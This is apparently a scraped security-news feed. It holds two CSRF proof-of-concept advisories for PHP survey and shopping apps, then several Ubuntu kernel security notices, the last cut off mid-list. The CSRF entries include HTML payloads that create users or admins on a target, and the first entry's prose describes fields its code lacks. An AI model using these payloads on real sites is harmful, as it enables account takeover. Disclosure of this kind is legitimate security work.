Online Survey System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Survey System 1.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Survey System 1.0 Cross Site Request Forgery

Ubuntu Security Notice 6975-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6975-1August 21, 2024linux, linux-aws, linux-azure, linux-gcp, linux-gke, linux-ibm,linux-lowlatency, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency,linux-oem-6.8, linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-nvidia-lowlatency: Linux low latency kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - User-Mode Linux (UML);   - MMC subsystem;(CVE-2024-39292, CVE-2024-39484)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1009-gke      6.8.0-1009.12   linux-image-6.8.0-1010-raspi    6.8.0-1010.11   linux-image-6.8.0-1011-ibm      6.8.0-1011.11   linux-image-6.8.0-1011-oem      6.8.0-1011.11   linux-image-6.8.0-1011-oracle   6.8.0-1011.11   linux-image-6.8.0-1011-oracle-64k  6.8.0-1011.11   linux-image-6.8.0-1012-nvidia   6.8.0-1012.12   linux-image-6.8.0-1012-nvidia-64k  6.8.0-1012.12   linux-image-6.8.0-1012-nvidia-lowlatency  6.8.0-1012.12.1   linux-image-6.8.0-1012-nvidia-lowlatency-64k  6.8.0-1012.12.1   linux-image-6.8.0-1013-azure    6.8.0-1013.15   linux-image-6.8.0-1013-azure-fde  6.8.0-1013.15   linux-image-6.8.0-1013-gcp      6.8.0-1013.14   linux-image-6.8.0-1014-aws      6.8.0-1014.15   linux-image-6.8.0-41-generic    6.8.0-41.41   linux-image-6.8.0-41-generic-64k  6.8.0-41.41   linux-image-6.8.0-41-lowlatency  6.8.0-41.41.1   linux-image-6.8.0-41-lowlatency-64k  6.8.0-41.41.1   linux-image-aws                 6.8.0-1014.15   linux-image-azure               6.8.0-1013.15   linux-image-azure-fde           6.8.0-1013.15   linux-image-gcp                 6.8.0-1013.14   linux-image-generic             6.8.0-41.41   linux-image-generic-64k         6.8.0-41.41   linux-image-generic-64k-hwe-24.04  6.8.0-41.41   linux-image-generic-hwe-24.04   6.8.0-41.41   linux-image-generic-lpae        6.8.0-41.41   linux-image-gke                 6.8.0-1009.12   linux-image-ibm                 6.8.0-1011.11   linux-image-ibm-classic         6.8.0-1011.11   linux-image-ibm-lts-24.04       6.8.0-1011.11   linux-image-kvm                 6.8.0-41.41   linux-image-lowlatency          6.8.0-41.41.1   linux-image-lowlatency-64k      6.8.0-41.41.1   linux-image-nvidia              6.8.0-1012.12   linux-image-nvidia-64k          6.8.0-1012.12   linux-image-nvidia-lowlatency   6.8.0-1012.12.1   linux-image-nvidia-lowlatency-64k  6.8.0-1012.12.1   linux-image-oem-24.04           6.8.0-1011.11   linux-image-oem-24.04a          6.8.0-1011.11   linux-image-oracle              6.8.0-1011.11   linux-image-oracle-64k          6.8.0-1011.11   linux-image-raspi               6.8.0-1010.11   linux-image-virtual             6.8.0-41.41   linux-image-virtual-hwe-24.04   6.8.0-41.41Ubuntu 22.04 LTS   linux-image-6.8.0-1012-nvidia   6.8.0-1012.12~22.04.1   linux-image-6.8.0-1012-nvidia-64k  6.8.0-1012.12~22.04.1   linux-image-nvidia-6.8          6.8.0-1012.12~22.04.1   linux-image-nvidia-64k-6.8      6.8.0-1012.12~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6975-1   CVE-2024-39292, CVE-2024-39484Package Information:   https://launchpad.net/ubuntu/+source/linux/6.8.0-41.41   https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1014.15   https://launchpad.net/ubuntu/+source/linux-azure/6.8.0-1013.15   https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1013.14   https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1009.12   https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-41.41.1   https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1012.12   https://launchpad.net/ubuntu/+source/linux-nvidia-lowlatency/6.8.0-1012.12.1   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-raspi/6.8.0-1010.11   https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1012.12~22.04.1

Ubuntu Security Notice USN-6975-1

Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

Ubuntu Security Notice 6974-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6974-1August 21, 2024linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15,linux-azure-fde, linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15,linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm,linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm,linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle,linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - MMC subsystem;   - Network drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;(CVE-2024-26921, CVE-2023-52629, CVE-2024-26680, CVE-2024-26830,CVE-2024-39484, CVE-2024-39292, CVE-2024-36901, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1051-gkeop   5.15.0-1051.58   linux-image-5.15.0-1061-ibm     5.15.0-1061.64   linux-image-5.15.0-1061-raspi   5.15.0-1061.64   linux-image-5.15.0-1063-intel-iotg  5.15.0-1063.69   linux-image-5.15.0-1063-nvidia  5.15.0-1063.64   linux-image-5.15.0-1063-nvidia-lowlatency  5.15.0-1063.64   linux-image-5.15.0-1065-gke     5.15.0-1065.71   linux-image-5.15.0-1065-kvm     5.15.0-1065.70   linux-image-5.15.0-1066-oracle  5.15.0-1066.72   linux-image-5.15.0-1067-gcp     5.15.0-1067.75   linux-image-5.15.0-1068-aws     5.15.0-1068.74   linux-image-5.15.0-1071-azure   5.15.0-1071.80   linux-image-5.15.0-1071-azure-fde  5.15.0-1071.80.1   linux-image-5.15.0-119-generic  5.15.0-119.129   linux-image-5.15.0-119-generic-64k  5.15.0-119.129   linux-image-5.15.0-119-generic-lpae  5.15.0-119.129   linux-image-5.15.0-119-lowlatency  5.15.0-119.129   linux-image-5.15.0-119-lowlatency-64k  5.15.0-119.129   linux-image-aws-lts-22.04       5.15.0.1068.68   linux-image-azure-fde-lts-22.04  5.15.0.1071.80.48   linux-image-azure-lts-22.04     5.15.0.1071.69   linux-image-gcp-lts-22.04       5.15.0.1067.63   linux-image-generic             5.15.0.119.119   linux-image-generic-64k         5.15.0.119.119   linux-image-generic-lpae        5.15.0.119.119   linux-image-gke                 5.15.0.1065.64   linux-image-gke-5.15            5.15.0.1065.64   linux-image-gkeop               5.15.0.1051.50   linux-image-gkeop-5.15          5.15.0.1051.50   linux-image-ibm                 5.15.0.1061.57   linux-image-intel-iotg          5.15.0.1063.63   linux-image-kvm                 5.15.0.1065.61   linux-image-lowlatency          5.15.0.119.109   linux-image-lowlatency-64k      5.15.0.119.109   linux-image-nvidia              5.15.0.1063.63   linux-image-nvidia-lowlatency   5.15.0.1063.63   linux-image-oracle-lts-22.04    5.15.0.1066.62   linux-image-raspi               5.15.0.1061.59   linux-image-raspi-nolpae        5.15.0.1061.59   linux-image-virtual             5.15.0.119.119Ubuntu 20.04 LTS   linux-image-5.15.0-1051-gkeop   5.15.0-1051.58~20.04.1   linux-image-5.15.0-1061-ibm     5.15.0-1061.64~20.04.1   linux-image-5.15.0-1063-intel-iotg  5.15.0-1063.69~20.04.1   linux-image-5.15.0-1067-gcp     5.15.0-1067.75~20.04.1   linux-image-5.15.0-1068-aws     5.15.0-1068.74~20.04.1   linux-image-5.15.0-1071-azure   5.15.0-1071.80~20.04.1   linux-image-5.15.0-1071-azure-fde  5.15.0-1071.80~20.04.1.1   linux-image-5.15.0-119-generic  5.15.0-119.129~20.04.1   linux-image-5.15.0-119-generic-64k  5.15.0-119.129~20.04.1   linux-image-5.15.0-119-generic-lpae  5.15.0-119.129~20.04.1   linux-image-5.15.0-119-lowlatency  5.15.0-119.129~20.04.1   linux-image-5.15.0-119-lowlatency-64k  5.15.0-119.129~20.04.1   linux-image-aws                 5.15.0.1068.74~20.04.1   linux-image-azure               5.15.0.1071.80~20.04.1   linux-image-azure-cvm           5.15.0.1071.80~20.04.1   linux-image-azure-fde           5.15.0.1071.80~20.04.1.48   linux-image-gcp                 5.15.0.1067.75~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.119.129~20.04.1   linux-image-generic-hwe-20.04   5.15.0.119.129~20.04.1   linux-image-generic-lpae-hwe-20.04  5.15.0.119.129~20.04.1   linux-image-gkeop-5.15          5.15.0.1051.58~20.04.1   linux-image-ibm                 5.15.0.1061.64~20.04.1   linux-image-intel               5.15.0.1063.69~20.04.1   linux-image-intel-iotg          5.15.0.1063.69~20.04.1   linux-image-lowlatency-64k-hwe-20.04  5.15.0.119.129~20.04.1   linux-image-lowlatency-hwe-20.04  5.15.0.119.129~20.04.1   linux-image-oem-20.04           5.15.0.119.129~20.04.1   linux-image-oem-20.04b          5.15.0.119.129~20.04.1   linux-image-oem-20.04c          5.15.0.119.129~20.04.1   linux-image-oem-20.04d          5.15.0.119.129~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.119.129~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6974-1   CVE-2023-52629, CVE-2023-52760, CVE-2024-26680, CVE-2024-26830,   CVE-2024-26921, CVE-2024-36901, CVE-2024-39292, CVE-2024-39484Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-119.129   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1068.74   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1071.80   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1071.80.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1067.75   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1065.71   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1051.58   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1061.64   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1063.69   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1065.70   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-119.129   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1063.64   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1066.72   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1061.64   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1068.74~20.04.1   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1071.80~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1071.80~20.04.1.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1067.75~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1051.58~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-119.129~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1061.64~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1063.69~20.04.1  https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-119.129~20.04.1

Ubuntu Security Notice USN-6974-1

Ubuntu Security Notice 6973-1 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6973-1August 21, 2024linux, linux-aws, linux-azure, linux-bluefield, linux-gcp, linux-gcp-5.4,linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm,linux-oracle, linux-oracle-5.4, linux-raspi, linux-xilinx-zynqmpvulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - MMC subsystem;   - Network drivers;   - SCSI drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;(CVE-2024-26830, CVE-2024-39484, CVE-2024-36901, CVE-2024-26929,CVE-2024-26921, CVE-2021-46926, CVE-2023-52629, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   linux-image-5.4.0-1050-xilinx-zynqmp  5.4.0-1050.54   linux-image-5.4.0-1078-ibm      5.4.0-1078.83   linux-image-5.4.0-1091-bluefield  5.4.0-1091.98   linux-image-5.4.0-1098-gkeop    5.4.0-1098.102   linux-image-5.4.0-1115-raspi    5.4.0-1115.127   linux-image-5.4.0-1119-kvm      5.4.0-1119.127   linux-image-5.4.0-1130-oracle   5.4.0-1130.139   linux-image-5.4.0-1131-aws      5.4.0-1131.141   linux-image-5.4.0-1135-gcp      5.4.0-1135.144   linux-image-5.4.0-1136-azure    5.4.0-1136.143   linux-image-5.4.0-193-generic   5.4.0-193.213   linux-image-5.4.0-193-generic-lpae  5.4.0-193.213   linux-image-5.4.0-193-lowlatency  5.4.0-193.213   linux-image-aws-lts-20.04       5.4.0.1131.128   linux-image-azure-lts-20.04     5.4.0.1136.130   linux-image-bluefield           5.4.0.1091.87   linux-image-gcp-lts-20.04       5.4.0.1135.137   linux-image-generic             5.4.0.193.191   linux-image-generic-lpae        5.4.0.193.191   linux-image-gkeop               5.4.0.1098.96   linux-image-gkeop-5.4           5.4.0.1098.96   linux-image-ibm-lts-20.04       5.4.0.1078.107   linux-image-kvm                 5.4.0.1119.115   linux-image-lowlatency          5.4.0.193.191   linux-image-oem                 5.4.0.193.191   linux-image-oem-osp1            5.4.0.193.191   linux-image-oracle-lts-20.04    5.4.0.1130.123   linux-image-raspi               5.4.0.1115.145   linux-image-raspi2              5.4.0.1115.145   linux-image-virtual             5.4.0.193.191   linux-image-xilinx-zynqmp       5.4.0.1050.50Ubuntu 18.04 LTS   linux-image-5.4.0-1078-ibm      5.4.0-1078.83~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1130-oracle   5.4.0-1130.139~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1135-gcp      5.4.0-1135.144~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-193-generic   5.4.0-193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-193-lowlatency  5.4.0-193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-gcp                 5.4.0.1135.144~18.04.1                                   Available with Ubuntu Pro   linux-image-generic-hwe-18.04   5.4.0.193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-ibm                 5.4.0.1078.83~18.04.1                                   Available with Ubuntu Pro   linux-image-lowlatency-hwe-18.04  5.4.0.193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-oem                 5.4.0.193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-oem-osp1            5.4.0.193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-oracle              5.4.0.1130.139~18.04.1                                   Available with Ubuntu Pro   linux-image-snapdragon-hwe-18.04  5.4.0.193.213~18.04.1                                   Available with Ubuntu Pro   linux-image-virtual-hwe-18.04   5.4.0.193.213~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6973-1   CVE-2021-46926, CVE-2023-52629, CVE-2023-52760, CVE-2024-24860,   CVE-2024-26830, CVE-2024-26921, CVE-2024-26929, CVE-2024-36901,   CVE-2024-39484Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-193.213   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1131.141   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1136.143   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1091.98   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1135.144   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1098.102   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1078.83   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1119.127   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1130.139   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1115.127   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1050.54

Ubuntu Security Notice USN-6973-1

Ubuntu Security Notice 6972-1 - Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the Linux Kernel contained a race condition, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6972-1August 21, 2024linux, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - GPU drivers;   - MMC subsystem;   - Network drivers;   - PHY drivers;   - Pin controllers subsystem;   - Xen hypervisor drivers;   - GFS2 file system;   - Core kernel;   - Bluetooth subsystem;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;   - ALSA SH drivers;(CVE-2024-26903, CVE-2024-35835, CVE-2023-52644, CVE-2024-39292,CVE-2024-36940, CVE-2024-26600, CVE-2023-52629, CVE-2024-35955,CVE-2023-52760, CVE-2023-52806, CVE-2024-39484, CVE-2024-26679,CVE-2024-26654, CVE-2024-36901, CVE-2024-26687, CVE-2023-52470)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-4.15.0-1155-kvm     4.15.0-1155.160                                   Available with Ubuntu Pro   linux-image-4.15.0-1165-gcp     4.15.0-1165.182                                   Available with Ubuntu Pro   linux-image-4.15.0-228-generic  4.15.0-228.240                                   Available with Ubuntu Pro   linux-image-4.15.0-228-lowlatency  4.15.0-228.240                                   Available with Ubuntu Pro   linux-image-gcp-lts-18.04       4.15.0.1165.178                                   Available with Ubuntu Pro   linux-image-generic             4.15.0.228.212                                   Available with Ubuntu Pro   linux-image-kvm                 4.15.0.1155.146                                   Available with Ubuntu Pro   linux-image-lowlatency          4.15.0.228.212                                   Available with Ubuntu Pro   linux-image-virtual             4.15.0.228.212                                   Available with Ubuntu ProUbuntu 16.04 LTS   linux-image-4.15.0-1165-gcp     4.15.0-1165.182~16.04.1                                   Available with Ubuntu Pro   linux-image-4.15.0-228-generic  4.15.0-228.240~16.04.1                                   Available with Ubuntu Pro   linux-image-4.15.0-228-lowlatency  4.15.0-228.240~16.04.1                                   Available with Ubuntu Pro   linux-image-gcp                 4.15.0.1165.182~16.04.1                                   Available with Ubuntu Pro   linux-image-generic-hwe-16.04   4.15.0.228.240~16.04.1                                   Available with Ubuntu Pro   linux-image-gke                 4.15.0.1165.182~16.04.1                                   Available with Ubuntu Pro   linux-image-lowlatency-hwe-16.04  4.15.0.228.240~16.04.1                                   Available with Ubuntu Pro   linux-image-oem                 4.15.0.228.240~16.04.1                                   Available with Ubuntu Pro   linux-image-virtual-hwe-16.04   4.15.0.228.240~16.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6972-1   CVE-2023-52470, CVE-2023-52629, CVE-2023-52644, CVE-2023-52760,   CVE-2023-52806, CVE-2024-22099, CVE-2024-24860, CVE-2024-26600,   CVE-2024-26654, CVE-2024-26679, CVE-2024-26687, CVE-2024-26903,   CVE-2024-35835, CVE-2024-35955, 